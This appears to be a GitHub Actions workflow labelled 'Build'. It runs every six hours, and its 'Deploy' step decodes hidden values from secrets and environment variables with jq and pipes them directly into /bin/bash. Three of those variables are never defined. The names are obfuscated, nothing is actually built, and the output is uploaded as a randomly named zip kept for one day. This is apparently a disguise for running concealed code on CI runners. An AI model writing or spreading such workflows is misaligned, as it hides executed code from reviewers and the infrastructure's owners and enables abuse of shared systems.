name: Build
on:
  workflow_dispatch:

  schedule:
    - cron: '38 5,11,17,23 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  dispatcher:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Deploy
        env:
          aly0110: ${{ secrets.aly0110 }}
        run: |
          printf '%s' "$aly0110" | jq -r .gqf76 | /bin/bash
          printf '%s' "$ggdqq53" | jq -r .trja0 | /bin/bash
          echo $uzb191 | jq -r .da49 | /bin/bash
          printf '%s' "$uorwl1" | jq -r .ozd059 | /bin/bash

      - name: Save results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: BB4eI5Yn
          path: "*.zip"
          retention-days: 1
